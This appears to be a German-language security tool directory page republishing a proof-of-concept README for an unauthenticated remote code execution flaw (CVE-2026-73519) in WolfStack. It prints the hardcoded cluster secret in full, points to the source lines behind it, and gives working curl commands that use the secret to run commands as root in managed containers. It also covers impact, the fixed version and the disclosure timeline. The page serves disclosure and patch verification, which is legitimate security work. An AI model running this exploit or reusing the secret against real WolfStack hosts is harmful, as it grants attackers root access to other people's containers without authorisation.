Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-73519-WolfStack-PoC — PoC für CVE-2026-73519 - hartcodiertes Cluster-Secret in WolfStack führt zu nicht authentifizierter RCE (CVSS 9.8) | Kitploit
Tools/GitHubGitHub/squeeze440/cve-2026-73519-wolfstack-poc
Container-SicherheitSchwachstellenanalyseExploitationWebanwendungs-ExploitationAuthentifizierungAPI-Sicherheit
GitHubsqueeze440/cve-2026-73519-wolfstack-poc

CVE-2026-73519-WolfStack-PoC

PoC für CVE-2026-73519 - hartcodiertes Cluster-Secret in WolfStack führt zu nicht authentifizierter RCE (CVSS 9.8)

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
vor 5 TagenNoch nicht geprüft

CVE-2026-73519 — WolfStack: Hartcodiertes Cluster-Geheimnis → Nicht authentifizierte RCE

PoC für ein hartcodiertes Standard-Authentifizierungsgeheimnis in WolfStack, das es einem nicht authentifizierten Angreifer aus der Ferne ermöglicht, beliebige Befehle als root in jedem verwalteten Docker/LXC-Container auszuführen.

CVECVE-2026-73519
CNAVulnCheck
AdvisoryGHSA-r3mw-2wmq-j6jg · VulnCheck-Analyse
CVSS 3.19.8 Kritisch — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWECWE-798 (Hartcodierte Anmeldedaten), CWE-306 (Fehlende Authentifizierung für kritische Funktion)
Betroffenv25.9.0 und früher / jeder Knoten, der die Migration zu einem installationsspezifischen Geheimnis nicht abgeschlossen hat
Behoben inv25.9.2 / v25.9.3
EntdeckerDostxodjayev Abdullox (@squeeze440)

Grundursache

src/auth/mod.rs:32 liefert ein einzelnes hartcodiertes Geheimnis aus, das in jeden WolfStack-Build fest eingebettet ist:

root@kitploit:~
const CLUSTER_SECRET: &str = "wsk_a7f3b9e2c1d4f6a8b0e3d5c7f9a1b3d5e7f9a1c3b5d7e9f0a2b4c6d8e0f1a3";

auth::default_secret_accepted() (src/auth/mod.rs:430-460) akzeptiert diese Konstante standardmäßig als gültige Anmeldeinformation, sofern der Betreiber nicht ausdrücklich widersprochen hat (WOLFSTACK_REJECT_DEFAULT_SECRET=1) oder bereits auf ein eigenes Geheimnis umgestellt hat. api::require_auth() (src/api/mod.rs:518-535), das einzige Tor, das die gesamte REST-API schützt, behandelt eine Anfrage mit einem passenden X-WolfStack-Secret-Header als vollständig authentifiziert — keine Sitzung, kein API-Schlüssel, kein Konto.

Dieses Tor schützt POST /api/containers/{runtime}/{id}/exec (src/api/mod.rs:7145-7167), das die vom Aufrufer gelieferte Befehlszeichenkette unverändert im Zielcontainer ausführt. Jeder, der den öffentlichen Quellcode (oder dieses Repository) gelesen hat, kann sich als vertrauenswürdiger Cluster-Peer authentifizieren und beliebige Befehle als root in jedem Container ausführen, den der Knoten verwaltet.

Die in diesem Release-Zyklus hinzugefügte automatische Generierung des installationsspezifischen Geheimnisses greift nur bei Knoten mit keiner vorhandenen Geheimnisdatei und keinen aufgezeichneten Peers (src/auth/mod.rs:250-261) — jeder aktualisierte Knoten, jeder Knoten, der auf die dokumentierte Race-Condition beim Start stößt, oder jeder Knoten mit einem nicht beschreibbaren Konfigurationspfad bleibt auf unbestimmte Zeit beim gemeinsamen Standard-Geheimnis, wobei nur eine Warnung in einer Protokollzeile ausgegeben wird.

Verwendung

Richten Sie TARGET und CONTAINER auf eine WolfStack-Instanz und einen Container aus, den Sie zu testen berechtigt sind, und führen Sie dann Folgendes aus:

root@kitploit:~
./poc.sh http://TARGET:8553 CONTAINER_NAME

Oder manuell:

root@kitploit:~
# Unauthenticated — rejected
curl -s -X POST http://TARGET:8553/api/containers/docker/CONTAINER_NAME/exec \
  -H "Content-Type: application/json" -d '{"command":"whoami"}'
# -> {"error":"Not authenticated"}  HTTP 401

# Hardcoded secret from src/auth/mod.rs:32 — full RCE as root, no login
curl -s -X POST http://TARGET:8553/api/containers/docker/CONTAINER_NAME/exec \
  -H "Content-Type: application/json" \
  -H "X-WolfStack-Secret: wsk_a7f3b9e2c1d4f6a8b0e3d5c7f9a1b3d5e7f9a1c3b5d7e9f0a2b4c6d8e0f1a3" \
  -d '{"command":"id; hostname"}'
# -> {"exit_code":0,"ok":true,"stdout":"uid=0(root) gid=0(root) ...\n<container-id>\n"}  HTTP 200

PoC-Terminalausgabe — nicht authentifizierte Anfrage abgelehnt, anschließend liefert dieselbe Anfrage mit dem hartcodierten X-WolfStack-Secret-Header die Root-Befehlsausgabe aus dem laufenden Container

Verifiziert gegen die echte, prüfsummenverifizierte Release-Binärdatei v25.9.0 (sha256 82aab42b6ab17a146aa5a108f090b15c6c4bee8159f67e735deb533a437c207c) mit einem echten alpine:latest-Container als Ziel. Die Container-ID in der Antwortausgabe stimmt mit docker ps auf dem Opfer-Host überein.

Auswirkungen

  • Alle Docker/LXC-Container auf dem Host auflisten (/api/containers/docker, /api/containers/lxc), ohne Authentifizierung.
  • Über denselben Header beliebige Befehle als root in jedem von ihnen ausführen.
  • Dieselbe Umgehung erreicht jede andere durch require_auth geschützte Route (Peer-/Knotenverwaltung, Backups usw.) — dieses PoC zielt auf die Container-Exec-Senke als deutlichste Auswirkung, nicht auf eine erschöpfende Liste.

Behebung

Aktualisieren Sie auf v25.9.2 oder neuer. Der Maintainer hat die Akzeptanz des Standard-Geheimnisses auf standardmäßige Ablehnung (reject-by-default) umgestellt und einen erzwungenen Rotationspfad für bestehende Installationen hinzugefügt.

Timeline der Offenlegung

  • 2026-07-31 — Über GitHub Security Advisories an den Maintainer gemeldet.
  • Der Maintainer veröffentlichte einen Fix in v25.9.2 / v25.9.3.
  • 2026-08-08 — Zur CVE-Vergabe bei VulnCheck eingereicht (Schnellverfahren für bereits öffentliche Schwachstellen).
  • 2026-08-16 — CVE-2026-73519 von VulnCheck vergeben.

Haftungsausschluss

Veröffentlicht, nachdem der Fix ausgeliefert und die CVE vergeben wurde, für defensive/lehrreiche Zwecke — Überprüfung des Patch-Status in Ihrer eigenen Infrastruktur. Führen Sie dies nicht gegen Systeme aus, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Genehmigung zum Testen haben.

Tool herunterladen